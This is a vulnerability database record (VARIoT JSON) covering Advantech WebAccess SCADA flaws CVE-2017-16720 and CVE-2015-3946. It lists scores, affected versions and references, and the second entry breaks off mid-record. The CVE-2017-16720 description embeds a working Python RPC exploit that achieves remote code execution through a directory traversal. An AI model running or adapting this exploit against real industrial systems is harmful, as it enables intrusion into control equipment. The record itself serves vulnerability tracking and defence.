Show details on source website{ "affected_products": { "_id": null, "data": [ { "_id": null, "model": "webaccess", "scope": null, "trust": 1.4, "vendor": "advantech", "version": null }, { "_id": null, "model": "webaccess", "scope": "lt", "trust": 1.4, "vendor": "advantech", "version": "8.3" }, { "_id": null, "model": "webaccess", "scope": "lte", "trust": 1.0, "vendor": "advantech", "version": "8.3.2" }, { "_id": null, "model": "webaccess", "scope": "eq", "trust": 0.9, "vendor": "advantech", "version": "8.1" }, { "_id": null, "model": "webaccess", "scope": "eq", "trust": 0.9, "vendor": "advantech", "version": "7.2" }, { "_id": null, "model": "webaccess", "scope": "eq", "trust": 0.6, "vendor": "advantech", "version": "8.3.2" }, { "_id": null, "model": "webaccess", "scope": "eq", "trust": 0.6, "vendor": "advantech", "version": "8.0" }, { "_id": null, "model": "webaccess 8.2 20170330", "scope": null, "trust": 0.3, "vendor": "advantech", "version": null }, { "_id": null, "model": "webaccess", "scope": "eq", "trust": 0.3, "vendor": "advantech", "version": "8.2" }, { "_id": null, "model": "webaccess 8.1 20160519", "scope": null, "trust": 0.3, "vendor": "advantech", "version": null }, { "_id": null, "model": "webaccess 8.0 20150816", "scope": null, "trust": 0.3, "vendor": "advantech", "version": null }, { "_id": null, "model": "webaccess", "scope": "eq", "trust": 0.3, "vendor": "advantech", "version": "8" }, { "_id": null, "model": "webaccess", "scope": "ne", "trust": 0.3, "vendor": "advantech", "version": "8.3" }, { "_id": null, "model": null, "scope": "eq", "trust": 0.2, "vendor": "webaccess", "version": "*" } ], "sources": [ { "db": "IVD", "id": "e2e0b982-39ab-11e9-bc27-000c29342cb1" }, { "db": "ZDI", "id": "ZDI-18-024" }, { "db": "ZDI", "id": "ZDI-18-056" }, { "db": "CNVD", "id": "CNVD-2018-00670" }, { "db": "BID", "id": "102424" }, { "db": "JVNDB", "id": "JVNDB-2017-011765" }, { "db": "CNNVD", "id": "CNNVD-201801-243" }, { "db": "NVD", "id": "CVE-2017-16720" } ] }, "configurations": { "_id": null, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "cpe_match": [ { "cpe22Uri": "cpe:/a:advantech:advantech_webaccess", "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2017-011765" } ] }, "credits": { "_id": null, "data": "Steven Seeley (mr_me) of Offensive Security", "sources": [ { "db": "ZDI", "id": "ZDI-18-024" } ], "trust": 0.7 }, "cve": "CVE-2017-16720", "cvss": { "_id": null, "data": [ { "cvssV2": [ { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "nvd@nist.gov", "availabilityImpact": "COMPLETE", "baseScore": 10.0, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 10.0, "id": "CVE-2017-16720", "impactScore": 10.0, "integrityImpact": "COMPLETE", "severity": "HIGH", "trust": 1.1, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0" }, { "acInsufInfo": null, "accessComplexity": "Low", "accessVector": "Network", "authentication": "None", "author": "NVD", "availabilityImpact": "None", "baseScore": 5.0, "confidentialityImpact": "Partial", "exploitabilityScore": null, "id": "CVE-2017-16720", "impactScore": null, "integrityImpact": "None", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "Medium", "trust": 0.8, "userInteractionRequired": null, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0" }, { "acInsufInfo": null, "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "author": "ZDI", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 8.6, "id": "CVE-2017-16720", "impactScore": 10.0, "integrityImpact": "COMPLETE", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "HIGH", "trust": 0.7, "userInteractionRequired": null, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0" }, { "acInsufInfo": null, "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "ZDI", "availabilityImpact": "PARTIAL", "baseScore": 5.0, "confidentialityImpact": "NONE", "exploitabilityScore": 10.0, "id": "CVE-2017-16720", "impactScore": 2.9, "integrityImpact": "NONE", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "MEDIUM", "trust": 0.7, "userInteractionRequired": null, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "CNVD", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "CNVD-2018-00670", "impactScore": 2.9, "integrityImpact": "NONE", "severity": "MEDIUM", "trust": 0.6, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "IVD", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "e2e0b982-39ab-11e9-bc27-000c29342cb1", "impactScore": 2.9, "integrityImpact": "NONE", "severity": "MEDIUM", "trust": 0.2, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.9 [IVD]" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "VULHUB", "availabilityImpact": "COMPLETE", "baseScore": 10.0, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 10.0, "id": "VHN-107671", "impactScore": 10.0, "integrityImpact": "COMPLETE", "severity": "HIGH", "trust": 0.1, "vectorString": "AV:N/AC:L/AU:N/C:C/I:C/A:C", "version": "2.0" } ], "cvssV3": [ { "attackComplexity": "LOW", "attackVector": "NETWORK", "author": "nvd@nist.gov", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "exploitabilityScore": 3.9, "id": "CVE-2017-16720", "impactScore": 5.9, "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "trust": 1.0, "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0" }, { "attackComplexity": "Low", "attackVector": "Network", "author": "NVD", "availabilityImpact": "None", "baseScore": 7.5, "baseSeverity": "High", "confidentialityImpact": "High", "exploitabilityScore": null, "id": "CVE-2017-16720", "impactScore": null, "integrityImpact": "None", "privilegesRequired": "None", "scope": "Unchanged", "trust": 0.8, "userInteraction": "None", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.0" } ], "severity": [ { "author": "nvd@nist.gov", "id": "CVE-2017-16720", "trust": 1.0, "value": "CRITICAL" }, { "author": "NVD", "id": "CVE-2017-16720", "trust": 0.8, "value": "High" }, { "author": "ZDI", "id": "CVE-2017-16720", "trust": 0.7, "value": "HIGH" }, { "author": "ZDI", "id": "CVE-2017-16720", "trust": 0.7, "value": "MEDIUM" }, { "author": "CNVD", "id": "CNVD-2018-00670", "trust": 0.6, "value": "MEDIUM" }, { "author": "CNNVD", "id": "CNNVD-201801-243", "trust": 0.6, "value": "CRITICAL" }, { "author": "IVD", "id": "e2e0b982-39ab-11e9-bc27-000c29342cb1", "trust": 0.2, "value": "CRITICAL" }, { "author": "VULHUB", "id": "VHN-107671", "trust": 0.1, "value": "HIGH" }, { "author": "VULMON", "id": "CVE-2017-16720", "trust": 0.1, "value": "HIGH" } ] } ], "sources": [ { "db": "IVD", "id": "e2e0b982-39ab-11e9-bc27-000c29342cb1" }, { "db": "ZDI", "id": "ZDI-18-024" }, { "db": "ZDI", "id": "ZDI-18-056" }, { "db": "CNVD", "id": "CNVD-2018-00670" }, { "db": "VULHUB", "id": "VHN-107671" }, { "db": "VULMON", "id": "CVE-2017-16720" }, { "db": "JVNDB", "id": "JVNDB-2017-011765" }, { "db": "CNNVD", "id": "CNNVD-201801-243" }, { "db": "NVD", "id": "CVE-2017-16720" } ] }, "description": { "_id": null, "data": "A Path Traversal issue was discovered in WebAccess versions 8.3.2 and earlier. An attacker has access to files within the directory structure of the target device. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Advantech WebAccess. Authentication is not required to exploit this vulnerability.The specific flaw exists within the implementation of the 0x2711 IOCTL in the webvrpcs process. The issue results from the lack of proper validation of a user-supplied path prior to using it in file operations. An attacker can leverage this functionality to execute code under the context of Administrator. An attacker can leverage this vulnerability to delete files accessible to the web service. Advantech WebAccess (formerly known as BroadWin WebAccess) is a suite of browser-based HMI/SCADA software from Advantech. The software supports dynamic graphical display and real-time data control, and provides the ability to remotely control and manage automation equipment. Advantech WebAccess is prone to the following security vulnerabilities:\n1. Multiple denial-of-service vulnerabilities\n2. Multiple stack-based buffer-overflow vulnerabilities\n3. A directory-traversal vulnerability\n4. An SQL-injection vulnerability\n5. Multiple denial-of-service vulnerabilities\nAn attacker can exploit these issues to execute arbitrary code in the context of the application, or modify data, or exploit latent vulnerabilities in the underlying database,perform certain unauthorized actions, gain unauthorized access and obtain sensitive information. Failed attacks will cause denial of service conditions. #!/usr/bin/python2.7\n \n# Exploit Title: Advantech WebAccess \u003c 8.3 webvrpcs Directory Traversal RCE Vulnerability\n# Date: 03-11-2018\n# Exploit Author: Chris Lyne (@lynerc)\n# Vendor Homepage: www.advantech.com\n# Software Link: http://advcloudfiles.advantech.com/web/Download/webaccess/8.2/AdvantechWebAccessUSANode8.2_20170817.exe\n# Version: Advantech WebAccess 8.2-2017.08.18\n# Tested on: Windows Server 2008 R2 Enterprise 64-bit\n# CVE : CVE-2017-16720\n# See Also: https://www.zerodayinitiative.com/advisories/ZDI-18-024/\n \nimport sys, struct\nfrom impacket import uuid\nfrom impacket.dcerpc.v5 import transport\n \ndef call(dce, opcode, stubdata):\n dce.call(opcode, stubdata)\n res = -1\n try:\n res = dce.recv()\n except Exception, e:\n print \"Exception encountered...\" + str(e)\n sys.exit(1)\n return res\n \nif len(sys.argv) != 2:\n print \"Provide only host arg\"\n sys.exit(1)\n \nport = 4592\ninterface = \"5d2b62aa-ee0a-4a95-91ae-b064fdb471fc\"\nversion = \"1.0\"\n \nhost = sys.argv[1]\n \nstring_binding = \"ncacn_ip_tcp:%s\" % host\ntrans = transport.DCERPCTransportFactory(string_binding)\ntrans.set_dport(port)\n \ndce = trans.get_dce_rpc()\ndce.connect()\n \nprint \"Binding...\"\niid = uuid.uuidtup_to_bin((interface, version))\ndce.bind(iid)\n \nprint \"...1\"\nstubdata = struct.pack(\"\u003cIII\", 0x00, 0xc351, 0x04)\ncall(dce, 2, stubdata)\n \nprint \"...2\"\nstubdata = struct.pack(\"\u003cI\", 0x02)\nres = call(dce, 4, stubdata)\nif res == -1:\n print \"Something went wrong\"\n sys.exit(1)\nres = struct.unpack(\"III\", res)\n \nif (len(res) \u003c 3):\n print \"Received unexpected length value\"\n sys.exit(1)\n \nprint \"...3\"\n# ioctl 0x2711\nstubdata = struct.pack(\"\u003cIIII\", res[2], 0x2711, 0x204, 0x204)\ncommand = \"..\\\\..\\\\windows\\\\system32\\\\calc.exe\"\nfmt = \"\u003c\" + str(0x204) + \"s\"\nstubdata += struct.pack(fmt, command)\ncall(dce, 1, stubdata)\n \nprint \"\\nDid it work?\"\n \ndce.disconnect()\n\n", "sources": [ { "db": "NVD", "id": "CVE-2017-16720" }, { "db": "JVNDB", "id": "JVNDB-2017-011765" }, { "db": "ZDI", "id": "ZDI-18-024" }, { "db": "ZDI", "id": "ZDI-18-056" }, { "db": "CNVD", "id": "CNVD-2018-00670" }, { "db": "BID", "id": "102424" }, { "db": "IVD", "id": "e2e0b982-39ab-11e9-bc27-000c29342cb1" }, { "db": "VULHUB", "id": "VHN-107671" }, { "db": "VULMON", "id": "CVE-2017-16720" }, { "db": "PACKETSTORM", "id": "146743" } ], "trust": 4.14 }, "exploit_availability": { "_id": null, "data": [ { "reference": "https://www.scap.org.cn/vuln/vhn-107671", "trust": 0.1, "type": "unknown" }, { "reference": "https://vulmon.com/exploitdetails?qidtp=exploitdb\u0026qid=44278", "trust": 0.1, "type": "exploit" } ], "sources": [ { "db": "VULHUB", "id": "VHN-107671" }, { "db": "VULMON", "id": "CVE-2017-16720" } ] }, "external_ids": { "_id": null, "data": [ { "db": "NVD", "id": "CVE-2017-16720", "trust": 5.2 }, { "db": "BID", "id": "102424", "trust": 3.5 }, { "db": "ZDI", "id": "ZDI-18-024", "trust": 2.5 }, { "db": "ICS CERT", "id": "ICSA-18-004-02", "trust": 2.1 }, { "db": "TENABLE", "id": "TRA-2018-23", "trust": 1.8 }, { "db": "EXPLOIT-DB", "id": "44278", "trust": 1.8 }, { "db": "CNNVD", "id": "CNNVD-201801-243", "trust": 0.9 }, { "db": "CNVD", "id": "CNVD-2018-00670", "trust": 0.8 }, { "db": "ICS CERT", "id": "ICSA-18-004-02A", "trust": 0.8 }, { "db": "JVNDB", "id": "JVNDB-2017-011765", "trust": 0.8 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-4992", "trust": 0.7 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-5058", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-18-056", "trust": 0.7 }, { "db": "CXSECURITY", "id": "WLB-2018030106", "trust": 0.6 }, { "db": "IVD", "id": "E2E0B982-39AB-11E9-BC27-000C29342CB1", "trust": 0.2 }, { "db": "PACKETSTORM", "id": "146743", "trust": 0.2 }, { "db": "VULHUB", "id": "VHN-107671", "trust": 0.1 }, { "db": "VULMON", "id": "CVE-2017-16720", "trust": 0.1 } ], "sources": [ { "db": "IVD", "id": "e2e0b982-39ab-11e9-bc27-000c29342cb1" }, { "db": "ZDI", "id": "ZDI-18-024" }, { "db": "ZDI", "id": "ZDI-18-056" }, { "db": "CNVD", "id": "CNVD-2018-00670" }, { "db": "VULHUB", "id": "VHN-107671" }, { "db": "VULMON", "id": "CVE-2017-16720" }, { "db": "BID", "id": "102424" }, { "db": "JVNDB", "id": "JVNDB-2017-011765" }, { "db": "PACKETSTORM", "id": "146743" }, { "db": "CNNVD", "id": "CNNVD-201801-243" }, { "db": "NVD", "id": "CVE-2017-16720" } ] }, "id": "VAR-201801-0150", "iot": { "_id": null, "data": true, "sources": [ { "db": "IVD", "id": "e2e0b982-39ab-11e9-bc27-000c29342cb1" }, { "db": "CNVD", "id": "CNVD-2018-00670" }, { "db": "VULHUB", "id": "VHN-107671" } ], "trust": 1.4972832733333332 }, "iot_taxonomy": { "_id": null, "data": [ { "category": [ "ICS" ], "sub_category": null, "trust": 0.8 } ], "sources": [ { "db": "IVD", "id": "e2e0b982-39ab-11e9-bc27-000c29342cb1" }, { "db": "CNVD", "id": "CNVD-2018-00670" } ] }, "last_update_date": "2024-11-23T22:22:16.176000Z", "patch": { "_id": null, "data": [ { "title": "Advantech has issued an update to correct this vulnerability.", "trust": 1.4, "url": "https://ics-cert.us-cert.gov/advisories/ICSA-18-004-02" }, { "title": "Advantech WebAccess", "trust": 0.8, "url": "http://www.advantech.com/industrial-automation/webaccess" }, { "title": "Advantech WebAccess Path Traversal Vulnerability Patch", "trust": 0.6, "url": "https://www.cnvd.org.cn/patchInfo/show/113121" }, { "title": "Advantech WebAccess Repair measures for path traversal vulnerabilities", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=77554" } ], "sources": [ { "db": "ZDI", "id": "ZDI-18-024" }, { "db": "ZDI", "id": "ZDI-18-056" }, { "db": "CNVD", "id": "CNVD-2018-00670" }, { "db": "JVNDB", "id": "JVNDB-2017-011765" }, { "db": "CNNVD", "id": "CNNVD-201801-243" } ] }, "problemtype_data": { "_id": null, "data": [ { "problemtype": "CWE-22", "trust": 1.9 } ], "sources": [ { "db": "VULHUB", "id": "VHN-107671" }, { "db": "JVNDB", "id": "JVNDB-2017-011765" }, { "db": "NVD", "id": "CVE-2017-16720" } ] }, "references": { "_id": null, "data": [ { "trust": 3.5, "url": "https://ics-cert.us-cert.gov/advisories/icsa-18-004-02" }, { "trust": 3.3, "url": "http://www.securityfocus.com/bid/102424" }, { "trust": 1.9, "url": "https://www.exploit-db.com/exploits/44278/" }, { "trust": 1.8, "url": "https://www.tenable.com/security/research/tra-2018-23" }, { "trust": 1.8, "url": "https://www.zerodayinitiative.com/advisories/zdi-18-024/" }, { "trust": 0.9, "url": "https://nvd.nist.gov/vuln/detail/cve-2017-16720" }, { "trust": 0.8, "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-16720" }, { "trust": 0.8, "url": "https://ics-cert.us-cert.gov/advisories/icsa-18-004-02a" }, { "trust": 0.6, "url": "https://cxsecurity.com/issue/wlb-2018030106" }, { "trust": 0.3, "url": "http://webaccess.advantech.com" }, { "trust": 0.1, "url": "https://cwe.mitre.org/data/definitions/22.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov" }, { "trust": 0.1, "url": "https://www.advantech.com" }, { "trust": 0.1, "url": "http://advcloudfiles.advantech.com/web/download/webaccess/8.2/advantechwebaccessusanode8.2_20170817.exe" } ], "sources": [ { "db": "ZDI", "id": "ZDI-18-024" }, { "db": "ZDI", "id": "ZDI-18-056" }, { "db": "CNVD", "id": "CNVD-2018-00670" }, { "db": "VULHUB", "id": "VHN-107671" }, { "db": "VULMON", "id": "CVE-2017-16720" }, { "db": "BID", "id": "102424" }, { "db": "JVNDB", "id": "JVNDB-2017-011765" }, { "db": "PACKETSTORM", "id": "146743" }, { "db": "CNNVD", "id": "CNNVD-201801-243" }, { "db": "NVD", "id": "CVE-2017-16720" } ] }, "sources": { "_id": null, "data": [ { "db": "IVD", "id": "e2e0b982-39ab-11e9-bc27-000c29342cb1", "ident": null }, { "db": "ZDI", "id": "ZDI-18-024", "ident": null }, { "db": "ZDI", "id": "ZDI-18-056", "ident": null }, { "db": "CNVD", "id": "CNVD-2018-00670", "ident": null }, { "db": "VULHUB", "id": "VHN-107671", "ident": null }, { "db": "VULMON", "id": "CVE-2017-16720", "ident": null }, { "db": "BID", "id": "102424", "ident": null }, { "db": "JVNDB", "id": "JVNDB-2017-011765", "ident": null }, { "db": "PACKETSTORM", "id": "146743", "ident": null }, { "db": "CNNVD", "id": "CNNVD-201801-243", "ident": null }, { "db": "NVD", "id": "CVE-2017-16720", "ident": null } ] }, "sources_release_date": { "_id": null, "data": [ { "date": "2018-01-10T00:00:00", "db": "IVD", "id": "e2e0b982-39ab-11e9-bc27-000c29342cb1", "ident": null }, { "date": "2018-09-13T00:00:00", "db": "ZDI", "id": "ZDI-18-024", "ident": null }, { "date": "2018-01-05T00:00:00", "db": "ZDI", "id": "ZDI-18-056", "ident": null }, { "date": "2018-01-10T00:00:00", "db": "CNVD", "id": "CNVD-2018-00670", "ident": null }, { "date": "2018-01-05T00:00:00", "db": "VULHUB", "id": "VHN-107671", "ident": null }, { "date": "2018-01-05T00:00:00", "db": "VULMON", "id": "CVE-2017-16720", "ident": null }, { "date": "2018-01-04T00:00:00", "db": "BID", "id": "102424", "ident": null }, { "date": "2018-01-25T00:00:00", "db": "JVNDB", "id": "JVNDB-2017-011765", "ident": null }, { "date": "2018-03-13T02:22:22", "db": "PACKETSTORM", "id": "146743", "ident": null }, { "date": "2018-01-08T00:00:00", "db": "CNNVD", "id": "CNNVD-201801-243", "ident": null }, { "date": "2018-01-05T08:29:00.317000", "db": "NVD", "id": "CVE-2017-16720", "ident": null } ] }, "sources_update_date": { "_id": null, "data": [ { "date": "2018-09-13T00:00:00", "db": "ZDI", "id": "ZDI-18-024", "ident": null }, { "date": "2018-01-05T00:00:00", "db": "ZDI", "id": "ZDI-18-056", "ident": null }, { "date": "2018-01-10T00:00:00", "db": "CNVD", "id": "CNVD-2018-00670", "ident": null }, { "date": "2019-10-09T00:00:00", "db": "VULHUB", "id": "VHN-107671", "ident": null }, { "date": "2019-10-09T00:00:00", "db": "VULMON", "id": "CVE-2017-16720", "ident": null }, { "date": "2018-01-04T00:00:00", "db": "BID", "id": "102424", "ident": null }, { "date": "2018-04-03T00:00:00", "db": "JVNDB", "id": "JVNDB-2017-011765", "ident": null }, { "date": "2021-08-18T00:00:00", "db": "CNNVD", "id": "CNNVD-201801-243", "ident": null }, { "date": "2024-11-21T03:16:51.093000", "db": "NVD", "id": "CVE-2017-16720", "ident": null } ] }, "threat_type": { "_id": null, "data": "remote", "sources": [ { "db": "PACKETSTORM", "id": "146743" }, { "db": "CNNVD", "id": "CNNVD-201801-243" } ], "trust": 0.7 }, "title": { "_id": null, "data": "Advantech WebAccess Path traversal vulnerability", "sources": [ { "db": "IVD", "id": "e2e0b982-39ab-11e9-bc27-000c29342cb1" }, { "db": "CNVD", "id": "CNVD-2018-00670" }, { "db": "JVNDB", "id": "JVNDB-2017-011765" }, { "db": "CNNVD", "id": "CNNVD-201801-243" } ], "trust": 2.2 }, "type": { "_id": null, "data": "Path traversal", "sources": [ { "db": "IVD", "id": "e2e0b982-39ab-11e9-bc27-000c29342cb1" }, { "db": "CNNVD", "id": "CNNVD-201801-243" } ], "trust": 0.8 } }
var-201601-0640
Vulnerability from variot
Cross-site request forgery (CSRF) vulnerability in Advantech WebAccess before 8.1 allows remote attackers to hijack the authentication of unspecified victims via unknown vectors. Advantech WebAccess Contains a cross-site request forgery vulnerability.Authentication may be hijacked by a third party. WebAccess HMI/SCADA software provides remote control and management, allowing users to easily view and configure automation equipment in facility management systems, power stations and building automation systems. Advantech WebAccess is prone to following security vulnerabilities: 1. A denial-of-service vulnerability 2. An arbitrary file-upload vulnerability 3. A directory-traversal vulnerability 4. Multiple stack-based buffer-overflow vulnerabilities 5. A heap-based buffer overflow vulnerability 6. Multiple buffer-overflow vulnerabilities 7. Multiple information disclosure vulnerabilities 8. A cross-site scripting vulnerability 9. An SQL-injection vulnerability 10. A remote-code execution vulnerability An attacker can exploit these issues to execute arbitrary code in the context of the application, cause a denial-of-service condition, upload arbitrary files, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database, to use directory-traversal sequences ('../') to retrieve arbitrary files, obtain sensitive information and perform certain unauthorized actions. This may aid in further attacks. Advantech WebAccess 8.0 and prior versions are vulnerable. Advantech WebAccess is a browser-based HMI/SCADA software developed by Advantech. A remote attacker could exploit this vulnerability to perform unauthorized operations
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201601-0640", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "webaccess", "scope": "lt", "trust": 1.4, "vendor": "advantech", "version": "8.1" }, { "model": "webaccess", "scope": "lte", "trust": 1.0, "vendor": "advantech", "version": "8.0" }, { "model": "webaccess", "scope": "eq", "trust": 0.6, "vendor": "advantech", "version": "8.0" }, { "model": "webaccess", "scope": "eq", "trust": 0.3, "vendor": "advantech", "version": "8" }, { "model": "webaccess", "scope": "eq", "trust": 0.3, "vendor": "advantech", "version": "7.2" }, { "model": "webaccess", "scope": "ne", "trust": 0.3, "vendor": "advantech", "version": "8.1" }, { "model": null, "scope": "eq", "trust": 0.2, "vendor": "webaccess", "version": "*" } ], "sources": [ { "db": "IVD", "id": "64f288be-2351-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2016-00426" }, { "db": "BID", "id": "80745" }, { "db": "JVNDB", "id": "JVNDB-2015-006782" }, { "db": "CNNVD", "id": "CNNVD-201601-320" }, { "db": "NVD", "id": "CVE-2015-3946" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "cpe_match": [ { "cpe22Uri": "cpe:/a:advantech:advantech_webaccess", "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2015-006782" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Ilya Karpov of Positive Technologies, Ivan Sanchez, Andrea Micalizzi, Ariele Caltabiano, Fritz Sands, Steven Seeley, and an anonymous researcher", "sources": [ { "db": "BID", "id": "80745" } ], "trust": 0.3 }, "cve": "CVE-2015-3946", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "author": "nvd@nist.gov", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 8.6, "id": "CVE-2015-3946", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "MEDIUM", "trust": 1.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "author": "CNVD", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 8.6, "id": "CNVD-2016-00426", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "MEDIUM", "trust": 0.6, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "author": "IVD", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 8.6, "id": "64f288be-2351-11e6-abef-000c29c66e3d", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "MEDIUM", "trust": 0.2, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.9 [IVD]" }, { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "author": "VULHUB", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 8.6, "id": "VHN-81907", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "MEDIUM", "trust": 0.1, "vectorString": "AV:N/AC:M/AU:N/C:P/I:P/A:P", "version": "2.0" } ], "cvssV3": [ { "attackComplexity": "LOW", "attackVector": "NETWORK", "author": "nvd@nist.gov", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "exploitabilityScore": 2.8, "id": "CVE-2015-3946", "impactScore": 5.9, "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "trust": 1.0, "userInteraction": "REQUIRED", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0" } ], "severity": [ { "author": "nvd@nist.gov", "id": "CVE-2015-3946", "trust": 1.0, "value": "HIGH" }, { "author": "NVD", "id": "CVE-2015-3946", "trust": 0.8, "value": "Medium" }, { "author": "CNVD", "id": "CNVD-2016-00426", "trust": 0.6, "value": "MEDIUM" }, { "author": "CNNVD", "id": "CNNVD-201601-320", "trust": 0.6, "value": "MEDIUM" }, { "author": "IVD", "id": "64f288be-2351-11e6-abef-000c29c66e3d", "trust": 0.2, "value": "MEDIUM" }, { "author": "VULHUB", "id": "VHN-81907", "trust": 0.1, "value": "MEDIUM" } ] } ], "sources": [ { "db": "IVD", "id": "64f288be-2351-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2016-00426" }, { "db": "VULHUB", "id": "VHN-81907" }, { 